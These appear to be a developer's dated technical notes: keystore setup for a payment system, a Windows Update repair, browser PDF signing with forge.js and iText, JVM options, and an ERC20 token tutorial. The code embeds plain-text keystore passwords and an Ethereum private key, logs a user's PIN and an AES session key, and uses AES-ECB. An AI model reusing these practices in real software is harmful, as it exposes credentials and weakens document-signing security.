  keytool -import -v -alias payment_signing -file UAT_2016_epayment_signing-b64.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017

Generate trustedCertEntry (trust1)
  #keytool -genkey -keystore xxx_egis.jks -keyalg RSA -keysize 2048 -validity 3650 -storepass yyy.xxx@2017
  keytool -import -trustcacerts -v -alias trust1 -file iscca256.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017
  keytool -import -trustcacerts -v -alias rootca -file rootca256.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017
  #keytool -delete -alias mykey -keystore trust_store3.jks -storepass yyy.xxx@2017 // as xxx_egis is created and mykey does not exist

Add below item as below in KMU
 * key entry : friendly3
 * cert entry : payment_signing
 * cert entry : trust1
Add passphase boci-key and ppsb-key with usage=paymentRecon

Keystore

1 2	D:\keystore\xxx_master.jks comes from rm2\keys\sit\xxx_master.jks D:\keystore\xxx_egis.jks comes from rm2\keys\sit\xxx_egis.jks

Install unlimited strength JCE policy files named local_policy.jar and US_export_policy.jar at \lib\security

paymentclient_web -> IApp1/2, paymentrecon-portal_web, paymentrecon-dept_web -> GApp1/2

JOB_RM_PAY_BACKGROUND_RECOVERY
JOB_RM_PAYRECON_PAYMENT_RECON_01_PPSB
JOB_RM_PAYRECON_PAYMENT_RECON_02_BOCI
JOB_RM_PAYRECON_PSDR_EXPORTER

JOB_RM_PAYRECON_PSDR_IMPORTER

<jms-queue name="BackgroundRecoveryQueue" entries="queue/BackgroundRecoveryQueue"/>
<jms-queue name="PSDRExporterScheduleJobQueue" entries="queue/PSDRExporterScheduleJobQueue"/>
<jms-queue name="PSDRImporterScheduleJobQueue" entries="queue/PSDRImporterScheduleJobQueue"/>
<jms-queue name="PaymentReconScheduleJobQueue" entries="queue/PaymentReconScheduleJobQueue"/>

2019-05-07

2019-05-07

Fix Problem in Windows Update

Encounter error code 0x800f0831, that means missing some security patch before installing current windows update.

check log file CBS.log in path C:\Windows\Logs\CBS, it is found there is missing package shown as below

2019-05-07 10:30:15, Info                  CBS    Store corruption, manifest missing for package: Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6
2019-05-07 10:30:15, Error                 CBS    Failed to resolve package 'Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6' [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info                  CBS    Mark store corruption flag because of package: Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6. [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info                  CBS    Failed to resolve package [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info                  CBS    Failed to get next package to re-evaluate [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info                  CBS    Failed to process component watch list. [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]

Then download the file KB4093121 from Windows Updates category website, and run following commands to re-install the security update

copy c:\Users\Administrator\Downloads\windows8.1-kb4093121-x64_4e8483bcb4ad56a5b63959af8c3fc0dba9f93d48.msu c:\Windows\Temp
cd c:\Windows\Temp
expand windows8.1-kb4093121-x64_4e8483bcb4ad56a5b63959af8c3fc0dba9f93d48.msu -f:* .
DISM.exe /Online /Add-Package /PackagePath:Windows8.1-kb4093121-x64.cab

Also we can check log file at c:\Windows\Logs\DISM\dism.log

To repairing system and servicing health by running

1
2
3

--> sfc /scannow
--> dism.exe /online /cleanup-image /scanhealth
--> dism.exe /online /cleanup-image /restorehealth

Reference

Fix 0x800F0831,CBS_E_STORE_CORRUPTION, this is the solution
List installed windows updates, by powershell or command
https://www.sysnative.com/forums/threads/server2012r2-datacenter-code-800f0831-kb2973351.23888/
Windows updates failed to install with error code : 800F0831 in Windows Server 2012 R2
Windows Update Catalog, download KB from here

2019-01-23

2019-01-23

PDF Signing By p12 With JS

DocSignController.java

@GetMapping("/doc-sign/sign")
public ResponseEntity<Resource> getHashForSign() throws IOException {
    log.debug("start to generate merged PDF in java web start program");
    synchronized (eventPublisher) {
        eventPublisher.publishEvent(new OnDocMergeEvent(getUserId(), getXxxFormMaster().getXxxFormMasterId(), getXxxFormMaster().getFormType()));
    }
    Integer xxxFormMasterId = getXxxFormMaster().getXxxFormMasterId();
    String userId = getUserId();

    List<SuppDoc> suppDocs = suppDocMapper.selectSuppDocByXxxFormMasterIdAndDocTypeAndUserId(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_GEN_MERGE);
    if (suppDocs == null || suppDocs.isEmpty()) {
        suppDocs = suppDocMapper.selectSuppDocByXxxFormMasterIdAndDocTypeAndUserId(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_SIGN);
        if (suppDocs != null && !suppDocs.isEmpty()) {
            log.info("signed doc exists !!");
            return ResponseEntity.status(HttpStatus.NOT_ACCEPTABLE).body(null);
        }
        return ResponseEntity.status(HttpStatus.NOT_FOUND).body(null);
    }

    SuppDoc suppDoc = suppDocs.get(0);
    Integer suppDocId = suppDoc.getSuppDocId();

    Resource pdfFile = storageService.loadAsResource(xxxFormMasterId, suppDocId);

    File tempPdfFile = File.createTempFile("tmp", ".pdf");
    log.debug("Prepare pdf file for sign: {}", tempPdfFile.getPath());

    log.info("get hash for sign, userId {} form master id {}", userId, xxxFormMasterId);

    InputStream is = null;
    try {
        is = emptySignature(pdfFile.getInputStream(), tempPdfFile);
    } catch (DocumentException | GeneralSecurityException e) {
        log.error("error occurrs on calculate signature", e);
    }

    byte[] encryptedEmptySig = encrypt(StreamUtils.copyToByteArray(is));
    //byte[] emptySig = StreamUtils.copyToByteArray(is);
    String emptySig = Base64.getEncoder().encodeToString(encryptedEmptySig);

    ByteArrayResource resource = new ByteArrayResource(emptySig.getBytes(StandardCharsets.ISO_8859_1));

    HttpHeaders headers = new HttpHeaders();
    headers.add("Cache-Control", "no-cache, no-store, must-revalidate");
    headers.add("Pragma", "no-cache");
    headers.add("Expires", "0");

    request.getSession(false).setAttribute(TEMP_SIGN_PATH, tempPdfFile.getPath());

    return ResponseEntity.ok()
            .headers(headers)
            .contentLength(resource.contentLength())
            .contentType(MediaType.TEXT_PLAIN)
            .body(resource);
}

private byte[] encrypt(byte[] emptySig) {
    /*try {
        log.debug("js debugging for signing with forge")
        log.debug("HexBin.encode(emptySig) " + HexBin.encode(emptySig).substring(0, 500));
        MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
        byte hash[] = messageDigest.digest(emptySig);
        System.out.println("server emptySig sha256 hash = " + Hex.toHexString(hash));
    } catch (NoSuchAlgorithmException e1) {
    }*/

    String type = "X.509";

    String encodedCertificate = request.getParameter("certificate");
    try {
        CertificateFactory certificateFactory = CertificateFactory.getInstance(type);
        Certificate certificate = certificateFactory.generateCertificate(
                new ByteArrayInputStream(HashUtils.base64Decode(encodedCertificate)));
        PublicKey publicKey = certificate.getPublicKey();

        Cipher rsaCipher;
        try {
            rsaCipher = Cipher.getInstance(RSA_ALGORITHM);
            rsaCipher.init(Cipher.ENCRYPT_MODE, publicKey);

            // reference from https://stackoverflow.com/questions/24338108/java-encrypt-string-with-existing-public-key-file
            // Now create a new 256 bit Rijndael key to encrypt the file itself.
            // This will be the session key.
            /*KeyGenerator rijndaelKeyGenerator = KeyGenerator.getInstance("Rijndael");
            rijndaelKeyGenerator.init(256);
            log.debug("Generating session key...");
            Key rijndaelKey = rijndaelKeyGenerator.generateKey();
            log.debug("Done generating key.");
            
            byte[] encodedKeyBytes = rsaCipher.doFinal(rijndaelKey.getEncoded());
            ByteArrayOutputStream output = new ByteArrayOutputStream();
            output.write(encodedKeyBytes.length);
            output.write(encodedKeyBytes);
            
            // Now we need an Initialization Vector for the symmetric cipher in CBC mode
            SecureRandom random = new SecureRandom();
            byte[] iv = new byte[16];
            random.nextBytes(iv);
            
            output.write(iv);
            
            IvParameterSpec spec = new IvParameterSpec(iv);
            // Create the cipher for encrypting the file itself.
            Cipher symmetricCipher = Cipher.getInstance(RIJNDAEL_ALGORITHM);
            symmetricCipher.init(Cipher.ENCRYPT_MODE, rijndaelKey, spec);
            */

            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            DataOutputStream output = new DataOutputStream(baos);

            KeyGenerator generator = KeyGenerator.getInstance("AES");
            generator.init(128);
            log.debug("Generating session key...");
            SecretKey aesKey = generator.generateKey();
            log.debug("Done generating key.");

            log.debug("aesKey.getEncoded() = " + Base64.getEncoder().encodeToString(aesKey.getEncoded()));
            byte[] encodedKeyBytes = rsaCipher.doFinal(aesKey.getEncoded());

            // output = encrypted AES key length + encrypted AES key + empty signature encrypted by AES key
            log.debug("encrypted AES key length = " + encodedKeyBytes.length);
            output.writeInt(encodedKeyBytes.length);
            output.write(encodedKeyBytes);

            Cipher symmetricCipher = Cipher.getInstance(AES_ALGORITHM);
            symmetricCipher.init(Cipher.ENCRYPT_MODE, aesKey);

            output.write(symmetricCipher.doFinal(emptySig));
            output.flush();

            log.debug("length of encrypted data = " + baos.toByteArray().length);
            return baos.toByteArray();
        } catch (NoSuchAlgorithmException | NoSuchPaddingException | InvalidKeyException
                | IllegalBlockSizeException | BadPaddingException | IOException e) {
            log.error("encrypt empty signature", e);
        }
    } catch (CertificateException e) {
        log.error("encrypt", e);
    }

    return null;
}

private InputStream emptySignature(InputStream src, File dest)
        throws IOException, DocumentException, GeneralSecurityException {
    PdfReader reader = new PdfReader(src);
    FileOutputStream os = new FileOutputStream(dest);
    PdfStamper stamper = PdfStamper.createSignature(reader, os, '\0');
    PdfSignatureAppearance appearance = stamper.getSignatureAppearance();

    //appearance.setVisibleSignature(new Rectangle(0, 0, 0, 0), 1, FIELD_NAME);
    log.info("create empty signature");
    String position = (String) WebUtils.getSession().getAttribute(WebAttributeNames.SESSION_PSCT_DOC_SIGNATURE_POSITION);
    String[] p = position.split("\\|");
    appearance.setVisibleSignature(new Rectangle(Float.valueOf(p[0]), Float.valueOf(p[1]), Float.valueOf(p[2]), Float.valueOf(p[3])), Integer.valueOf(p[4]), Constants.SIG_FIELD_NAME);

    // set signature text
    Font font = new Font(FontFamily.TIMES_ROMAN, 10, Font.BOLD);
    appearance.setLayer2Font(font);
    appearance.setRunDirection(PdfWriter.RUN_DIRECTION_RTL);

    appearance.setLayer2Text("Signed By Digital Certificate");

    ClassPathResource pinImage = new ClassPathResource("static/images/Cert-sign.png");
    appearance.setImage(Image.getInstance(pinImage.getURL()));

    //appearance.setCertificate(chain[0]);
    ExternalSignatureContainer external = new ExternalBlankSignatureContainer(PdfName.ADOBE_PPKLITE,
            PdfName.ADBE_PKCS7_DETACHED);
    MakeSignature.signExternalContainer(appearance, external, 8192);
    os.close();
    return appearance.getRangeStream();
}

@PostMapping(value = "/doc-sign/sign", produces = MediaType.APPLICATION_JSON_VALUE)
@ResponseBody
public CertSignResult attachSignedHash() {
    CertSignResult certSignResult = new CertSignResult();
    certSignResult.setStatus(CertSignResult.STATUS_NOT_SIGNED);

    try {
        if (!WebUtils.validateCert(pkiClient)) {
            return certSignResult;
        }
    } catch (Exception e) {
        log.error("signHash", e);
        return certSignResult;
    }

    String tempPath = (String) request.getSession(false).getAttribute(TEMP_SIGN_PATH);

    Integer xxxFormMasterId = getXxxFormMaster().getXxxFormMasterId();
    String userId = getUserId();

    log.info("sign hash, userId {} form master id {}", userId, xxxFormMasterId);

    //		tryToDeleteSignedDoc();

    File tempSignedFile = null;

    try {
        tempSignedFile = File.createTempFile("signed-" + xxxFormMasterId + "-", ".pdf");

        String hash = request.getParameter("signed");
        //log.debug("hash {}", hash);
        // Save the hash to file pkcs7-hash.pem
        // View p7 file content by: openssl asn1parse -inform pem -in pkcs7-hash.pem

        byte[] signedhash = Base64.getDecoder().decode(hash);

        createSignature(tempPath, tempSignedFile, signedhash);
    } catch (DocumentException | GeneralSecurityException | IOException e) {
        log.error("Fail to sign document " + e);
        return certSignResult;
    }

    SimpleSuppDoc doc = new SimpleSuppDoc();
    doc.setXxxFormMasterId(xxxFormMasterId);
    doc.setLocalFile(tempSignedFile);
    doc.setSuppDocType(Constants.SUPP_DOC_TYPE_SYS_SIGN);

    try {
        Integer suppDocId = storageService.store(doc, userId);

        if (doc.isUploadSucess()) {
            insertSigningLog(userId, xxxFormMasterId, suppDocId);

            // no need to keep the merged doc
            storageService.deleteDocByUserIdAndType(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_GEN_MERGE);

            certSignResult.setStatus(CertSignResult.STATUS_SIGNED);
            request.getSession(false).setAttribute(WebAttributeNames.SESSION_PSCT_DOC_SIGN_STATUS, certSignResult);

            createZipFileForSignedDoc(userId, tempSignedFile);
            return certSignResult;
        }
    } catch (IOException e) {
        log.error("sign pdf file", e);
    } finally {
        if (tempSignedFile != null)
            tempSignedFile.delete();
    }

    return certSignResult;
}

private void createSignature(String src, File dest, byte[] signedHash)
        throws IOException, DocumentException, GeneralSecurityException {
    PdfReader reader = new PdfReader(src);
    FileOutputStream os = new FileOutputStream(dest);
    ExternalSignatureContainer external = new MyExternalSignatureContainer(signedHash);
    MakeSignature.signDeferred(reader, Constants.SIG_FIELD_NAME, os, external);
    os.close();
}

class MyExternalSignatureContainer implements ExternalSignatureContainer {
    protected byte[] sig;

    public MyExternalSignatureContainer(byte[] sig) {
        this.sig = sig;
    }

    @Override
    public void modifySigningDictionary(PdfDictionary signDic) {
    }

    @Override
    public byte[] sign(InputStream arg0) throws GeneralSecurityException {
        return sig;
    }
}

JS for PDF signing

function signAndSubmit() {
  console.log("signAndSubmit")

  var idType = $(":radio[name='idType']:checked").val();
  var hkid = $("#hkid").val();
  var hkidCheckDigit = $("#hkidCheckDigit").val();
  var passport = $("#passport").val()
  var file = document.getElementById("filename").files[0];

  if (!checkInput(idType, hkid, hkidCheckDigit, passport, file))
    return false;

  var password = $("#pin").val();
  console.log("password " + password)

  //Reading certificate from a 'file' form field
  var reader = new FileReader();
  reader.onload = function (e) {
    var contents = e.target.result;

    var pkcs12 = loadFile(password, contents);
    if(!pkcs12){
      showError(ErrorCode.INVALID_PIN);
      return false;
    }

    extractInfo(pkcs12, idType, hkid, hkidCheckDigit, passport).then(function (info) {
      var data = {
        signature: info.signature,
        // certLogin: "1",
        certificate: info.certificate,
        hkid: hkid + ":" + hkidCheckDigit,
        passport: passport,
        idType: idType,
      };

    $.ajax({
        type: 'GET',
        url: resetStatusUrl + "?keep-challenge=1",
        dataType: 'json',
        async: false,
        success: function(result) {
            if (result == 0) {
                console.log("start to do signing for the PDF");
            }
        },
        error: function(exception) {
          window.location.href = errPath;
        }
    });

    $.get(validateUserUrl, { hkid: data.hkid, passport: data.passport, idType: data.idType }).done(function (result) {
        if (result == 'T') {
          $.get(signAndSubmitUrl, { certificate: data.certificate }).done(function (signature) {
            console.log("signature = " + signature.length);
            var ciphertext = forge.util.decode64(signature);

            var buffer = forge.util.createBuffer(ciphertext, 'binary');

            var aesKeyLength = buffer.getInt32();
            console.log("aesKeyLength = " + aesKeyLength);

            var encryptedAesKey = buffer.getBytes(aesKeyLength);
            console.dir(encryptedAesKey);

            var aesKey = privateKey.decrypt(encryptedAesKey);
            console.log("decrypted aesKey = " + forge.util.encode64(aesKey));

            var decipher = forge.cipher.createDecipher('AES-ECB', aesKey);
            decipher.start();
            decipher.update(forge.util.createBuffer(buffer.getBytes()));

            var result = decipher.finish(); // check 'result' for true/false
            console.log("result = " + result);
            // outputs decrypted hex
            // console.log("outputs decrypted hex = " + decipher.output.toHex());

            var emptySig = decipher.output.getBytes();

            /* debug for signing
            var md = forge.md.sha256.create();
            var sh = md.update(decipher.output.getBytes()).digest().toHex();
            console.log("origEmptySig sha256 hash = " + sh);
            var sh = privateKey.sign(md.update(decipher.output.getBytes()))
            */

            var p7 = forge.pkcs7.createSignedData();
            p7.content = "Arbitrary data"; // privateKey.sign(md.update(decipher.output.getBytes()));

            let _cert; // individual's e-cert
            if (info.ca.indexOf('HKPOST') != -1) {
              _cert = certChain[0];
              certChain.reverse();
            } else {
              _cert = certChain.slice(-1)[0]
            }

            // e-cert order: root cert, intermediate cert, individual cert
            for (var i = 0; i <= certChain.length - 1; i++) {
              p7.addCertificate(certChain[i]);
            }

            p7.addSigner({
              key: privateKey,
              certificate: _cert,
              digestAlgorithm: forge.pki.oids.sha256,
              authenticatedAttributes: [{
                type: forge.pki.oids.contentType,
                value: forge.pki.oids.data
              }, {
                type: forge.pki.oids.messageDigest,
                value: emptySig // custom digest
              }, {
                type: forge.pki.oids.signingTime,
                value: new Date()
              }]
            });


            p7.sign({ detached: true });

            //var out = forge.asn1.toDer(p7.toAsn1()).getBytes();
            var out = forge.pkcs7.messageToPem(p7)
            // console.log(out);
            //var signedHash = forge.util.encode64(out);
            signedHash = out.replace("-----BEGIN PKCS7-----", "").replace("-----END PKCS7-----", "").split("\r\n").join("");
            //console.dir(signedHash);

            data.signed = signedHash;
            // console.dir(data);

            $.post(signAndSubmitUrl, data, function (result) {
              //alert("sign result " + result.status);
              if (result.status == "F") {
                showError(-131);
              } else {
                showMessage("doc.sign.success");
              }
            });
          }).fail(function(xhr, statusText, error){
              //alert("error status code " + xhr.status);
              if (xhr.status == 406) {
                  showError(-134);
              } else if (xhr.status == 404) {
                 showError(-133);
              }
          });
        } else {
          showError(-138);
        }
      });
    }).catch(function (info) {
      console.log("error code : " + info.errCode);
      showError(info.errCode);
    });
  }

  reader.readAsArrayBuffer(file);
  return false;
}

following code writtern was studied by the result from openssl asn1parse -inform pem -in pkcs7-hash.pem

for (var i = 0; i <= certChain.length - 1; i++) {
  p7.addCertificate(certChain[i]);
}

p7.addSigner({
  key: privateKey,
  certificate: _cert,
  digestAlgorithm: forge.pki.oids.sha256,
  authenticatedAttributes: [{
    type: forge.pki.oids.contentType,
    value: forge.pki.oids.data
  }, {
    type: forge.pki.oids.messageDigest,
    value: emptySig // custom digest
  }, {
    type: forge.pki.oids.signingTime,
    value: new Date()
  }]
});


p7.sign({ detached: true });

forge.js was hacked by adding following code

for(var ai = 0; ai < signer.authenticatedAttributes.length; ++ai) {
  var attr = signer.authenticatedAttributes[ai];
  if(attr.type === forge.pki.oids.messageDigest) {
    // use content message digest as value
    // attr.value = mds[signer.digestAlgorithm].digest();

    // ++++++++ change for setting a custom digest for PDF signing
    var digest = mds[signer.digestAlgorithm].start().update(attr.value).digest();
    attr.value = digest;
    // ++++++++ 

  } else if(attr.type === forge.pki.oids.signingTime) {
    // auto-populate signing time if not already set
    if(!attr.value) {
      attr.value = signingTime;
    }
  }

AuthenticationApplet.java (itext for PDF signing), below code is as the reference for study on PDF signing with js

public String signDoc(String emptySig, String keyID, String type, String privateKeyPassword) {
    if (privateKeyPassword == null || "".equals(privateKeyPassword.trim())) {
        privateKeyPassword = m_password;
    }

    if ("p12".equals(type)) {
        m_providerName = "BC";
    }

    PrivateKey privateKey = null;
    try {
        privateKey = (PrivateKey) m_keyStore.getKey(keyID, privateKeyPassword.toCharArray());
    } catch (UnrecoverableKeyException | KeyStoreException | NoSuchAlgorithmException e1) {
        e1.printStackTrace();
    }

    String signHashStr = "";

    try {
        //byte[] origEmptySig = Base64.getUrlDecoder().decode(emptySig);
        byte[] origEmptySig = decrypt(Base64.getDecoder().decode(emptySig), privateKey);
        // System.out.println("Showing information for debugging PDF signing using javascript
        // System.out.println("origEmptySig = " + Hex.toHexString(origEmptySig).substring(0, 300));

        ByteArrayInputStream emptySignature = new ByteArrayInputStream(origEmptySig);

        Security.addProvider(new BouncyCastleProvider());

        PrivateKeySignature signature = new PrivateKeySignature(privateKey, "SHA256", m_providerName);
        String hashAlgorithm = signature.getHashAlgorithm();

        System.out.println("hashAlgorithm = " + hashAlgorithm);
        BouncyCastleDigest digest = new BouncyCastleDigest();
        Certificate[] certificateChain = retrieveCertificateChain(keyID);

        /*String oid = DigestAlgorithms.getAllowedDigests(hashAlgorithm);
        System.out.println("oid = " + oid);*/

        MessageDigest messageDigest = digest.getMessageDigest(hashAlgorithm);
        byte hash[] = DigestAlgorithms.digest(emptySignature, messageDigest);

        //MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
        //byte hash[] = messageDigest.digest(origEmptySig);

        // System.out.println("origEmptySig sha256 hash = " + Hex.toHexString(hash));

        PdfPKCS7 sgn = new PdfPKCS7(null, certificateChain, hashAlgorithm, null, digest, false);
        Calendar cal = Calendar.getInstance();
        byte[] sh = sgn.getAuthenticatedAttributeBytes(hash, cal, null, null, CryptoStandard.CMS);
        //System.out.println("AuthenticatedAttributeBytes sha256 hash = " + Hex.toHexString(sh));

        byte[] extSignature = signature.sign(sh);
        //System.out.println("signed AuthenticatedAttributeBytes = " + Hex.toHexString(hash));

        sgn.setExternalDigest(extSignature, null, signature.getEncryptionAlgorithm());
        byte[] signHash = sgn.getEncodedPKCS7(hash, cal, null, null, null, CryptoStandard.CMS);

        // System.out.println("signHash = " + Hex.toHexString(signHash).substring(0, 300));

        signHashStr = Base64.getEncoder().encodeToString(signHash);
        //Files.write(Paths.get("D:/pkcs7-hash.p7b"), signHash, StandardOpenOption.CREATE);

        //System.out.println("signHash = " + signHashStr);
    } catch (Exception e) {
        System.err.println("An unknown error on calculating hash for signature: " + e.getMessage());
        e.printStackTrace();
    }

    return signHashStr;
}

private static final String RSA_ALGORITHM = "RSA/ECB/PKCS1Padding";
private static final String AES_ALGORITHM = "AES/ECB/PKCS5Padding";

private byte[] decrypt(byte[] ciphertext, PrivateKey privateKey) throws IOException {
    try {
        Cipher rsaCipher = Cipher.getInstance(RSA_ALGORITHM);
        rsaCipher.init(Cipher.DECRYPT_MODE, privateKey);

        DataInputStream dis = new DataInputStream(new ByteArrayInputStream(ciphertext));

        byte[] encryptedKeyBytes = new byte[dis.readInt()];

        dis.readFully(encryptedKeyBytes);

        byte[] aesKeyBytes = rsaCipher.doFinal(encryptedKeyBytes);

        SecretKeySpec key = new SecretKeySpec(aesKeyBytes, "AES");
        Cipher cipher = Cipher.getInstance(AES_ALGORITHM);
        cipher.init(Cipher.DECRYPT_MODE, key);

        ByteArrayOutputStream output = new ByteArrayOutputStream();
        int len = -1;
        byte[] buffer = new byte[4096];

        while ((len = dis.read(buffer, 0, buffer.length)) != -1) {
            output.write(buffer, 0, len);
        }

        output.flush();

        return cipher.doFinal(output.toByteArray());
    } catch (Exception e) {
        System.err.println("An unknown error on decrypt key: " + e.getMessage());
    }

    return null;
}

Reference

https://security.stackexchange.com/questions/73156/whats-the-difference-between-x-509-and-pkcs7-certificate
https://security.stackexchange.com/questions/41399/openssl-pkcs7-vs-s-mime
https://crypto.stackexchange.com/questions/37084/is-pkcs7-a-signature-format-or-a-certificate-format

openssl asn1parse -inform pem -in pkcs7-hash.pem
Manual verify PKCS#7 signed data with OpenSSL

2019-01-23

2019-01-23

JVM Study

List all VM flags

java -XX:+UnlockDiagnosticVMOptions -XX:+PrintFlagsFinal -version

JAVA_OPTS settings for OpenJDK 11

File: d:\App\wildfly-10.1.0.Final\bin\standalone.conf.bat

1
2

set "JAVA_OPTS=%JAVA_OPTS% -Dhk.gov.ogcio.egis.rm.common.PROPERTIES_FILEPATH=D:\rm -Djboss.bind.address=0.0.0.0 -Dspring.profiles.active=uat -Djavax.net.ssl.trustStore=D:\keystore\psct_egis.jks -Dfreetts.voices=de.dfki.lt.freetts.en.us.MbrolaVoiceDirectory -Dmbrola.base=D:\mbrola"
set "JAVA_OPTS=%JAVA_OPTS% -XX:MaxGCPauseMillis=500 -XX:ErrorFile=D:/log/hserrpid%p.log -XX:HeapDumpPath=D:/log/ -Xloggc:D:/log/gc.log -XX:+PrintGCDetails -XX:+HeapDumpOnOutOfMemoryError"

Profiling commands

jinfo <pid>

jmap -dump:live,format=b,file=heap.bin <pid>
jstack <pid>

Reference

http://stas-blogspot.blogspot.com/2011/07/most-complete-list-of-xx-options-for.html
https://www.oracle.com/technetwork/java/javase/tech/vmoptions-jsp-140102.html#Options
https://stackoverflow.com/questions/43087831/complete-list-of-jvm-options
https://my.oschina.net/u/3627055/blog/2995973

2018-08-25

2018-08-25

ERC20 TOKEN DEVELOP

Environment setup

Open C:\MinGW\msys\1.0\msys.bat

yarn global add truffle
yarn global add ganache-cli

# download web3j and configue path
export PATH=$PATH:/C/Users/me/AppData/Local/Yarn/Data/global/node_modules/.bin:/C/Users/me/Downloads/web3j-3.5.0/bin`

Start enthereum client (or you can install geth-windows-386-1.8.13-225171a4.exe)

ganache-cli

Compile and deploy contract

Open another command prompt
Reference https://www.codeooze.com/blockchain/ethereum-truffle-hello-world/ to initialize a project

cd /d 
mkdir enthereumn-test && cd enthereumn-test
truffle init
truffle console
> web3.eth.accounts

truffle unbox tutorialtoken # init command no need to call
truffle create contract TutorialToken # write your own contract

yarn add openzeppelin-solidity

Add following code to tutorialtoken.sol

pragma solidity ^0.4.22;

import "openzeppelin-solidity/contracts/token/ERC20/StandardToken.sol";

contract TutorialToken is StandardToken {
  string public name = "TutorialToken";
  string public symbol = "TT";
  uint8 public decimals = 2;
  uint public INITIAL_SUPPLY = 12000;

  constructor() public{
    totalSupply_ = INITIAL_SUPPLY;
    balances[msg.sender] = INITIAL_SUPPLY;
  }
}

Compile and migrate solidity code

1 2	truffle compile # compile contracts\.sol => build\contracts\.json truffle migrate # deploy contracts to ganache private network

Compile contract to java code

web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\TutorialToken.json -o .\java -p tutorialtoken
web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\SampleCrowdsaleToken.json -o .\java -p tutorialtoken
web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\SampleCrowdsale.json -o .\java -p tutorialtoken

Write junit to test the smart contract

package tutorialtoken;

import java.io.IOException;
import java.math.BigInteger;
import java.util.List;

import org.apache.log4j.Logger;
import org.junit.Before;
import org.junit.Test;
import org.web3j.crypto.Credentials;
import org.web3j.protocol.Web3j;
import org.web3j.protocol.admin.Admin;
import org.web3j.protocol.admin.methods.response.NewAccountIdentifier;
import org.web3j.protocol.admin.methods.response.PersonalUnlockAccount;
import org.web3j.protocol.core.DefaultBlockParameterName;
import org.web3j.protocol.core.methods.request.Transaction;
import org.web3j.protocol.core.methods.response.EthAccounts;
import org.web3j.protocol.core.methods.response.EthCoinbase;
import org.web3j.protocol.core.methods.response.EthGetBalance;
import org.web3j.protocol.core.methods.response.EthGetTransactionCount;
import org.web3j.protocol.core.methods.response.EthGetTransactionReceipt;
import org.web3j.protocol.core.methods.response.EthSendTransaction;
import org.web3j.protocol.core.methods.response.TransactionReceipt;
import org.web3j.protocol.http.HttpService;
import org.web3j.tx.Contract;

public class TutorialTokenTest {
    private Web3j web3j;
    private Admin admin;

    private EthCoinbase coinbase;
    private Credentials coinBaseCredentials;

    private String contractAddressOfTT = "0xbea3c4344beb0e0681e3506d2e55315b6efe4c8b";

    private static final Logger log = Logger.getLogger(TutorialTokenTest.class);

    @Before
    public void setup() throws IOException {
        web3j = Web3j.build(new HttpService("http://localhost:8545"));
        admin = Admin.build(new HttpService("http://127.0.0.1:8545"));

        String coinbaseAccountPrivatekey = "0x0d10b7b76213f4b40fc95d8b3c1701213ba66bdd2a778279ad0f6165c51d73c5";
        coinBaseCredentials = Credentials.create(coinbaseAccountPrivatekey);

        coinbase = web3j.ethCoinbase().send();

        web3j.transactionObservable().subscribe(tx -> {
            log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s, value=%s", tx.getHash(), tx.getBlockHash(), tx.getFrom(), tx.getTo(), tx.getValue().intValue()));
        });
    }

    @Test
    public void showAccounts() throws IOException {
        List<String> account = web3j.ethAccounts().send().getAccounts();
        //account.stream().forEach(a -> log.info(a));
        account.stream().forEach(System.out::println);

        String coinbase = web3j.ethAccounts().send().getAccounts().get(0); // or coinbase = web3j.ethCoinbase().send();
        log.info("coinbase = " + coinbase);
    }

    @Test
    public void createAccount() throws IOException {
        String password = "12345678";
        NewAccountIdentifier newAccountIdentifier = admin.personalNewAccount(password).send();
        String address = newAccountIdentifier.getAccountId();
        log.info("New account address: " + address);
    }

    @Test
    public void unlockAccount() throws IOException {
        String password = "12345678";
        NewAccountIdentifier newAccountIdentifier = admin.personalNewAccount(password).send();
        String address = newAccountIdentifier.getAccountId();
        log.info("New account address 22: " + address);

        BigInteger unlockDuration = BigInteger.valueOf(60L);
        try {
            PersonalUnlockAccount personalUnlockAccount = admin.personalUnlockAccount(address, password, unlockDuration).send();
            Boolean isUnlocked = personalUnlockAccount.accountUnlocked();
            log.info("Account unlock " + isUnlocked);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Test
    public void deployContract() throws Exception {
        //Credentials credentials = Credentials.create("0xf2064bdf023de8d86e5e4aedc04e3e176f89d8051cedbb95332a7ea9fb99dcc4");
        TutorialToken tutorialToken = TutorialToken.deploy(web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT).send();
        if (tutorialToken.getTransactionReceipt().isPresent()) {
            log.info("TransactionReceipt: " + tutorialToken.getTransactionReceipt().get());
            contractAddressOfTT = tutorialToken.getContractAddress();
            log.info("TutorialToken contractAddress: " + contractAddressOfTT);

            TutorialToken tutorialToken2 = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
            log.info("loaded tutorialToken: " + tutorialToken2);
            log.info("tutorialToken isValid: " + tutorialToken2.isValid());
        }
    }

    @Test
    public void balanceOfTutorialToken() throws Exception {
        //Credentials credentials = Credentials.create("0xf2064bdf023de8d86e5e4aedc04e3e176f89d8051cedbb95332a7ea9fb99dcc4");
        //String contractAddress = "0x15b4cd705c0646c551e264c3a5f5b0ac0ad0ad09";

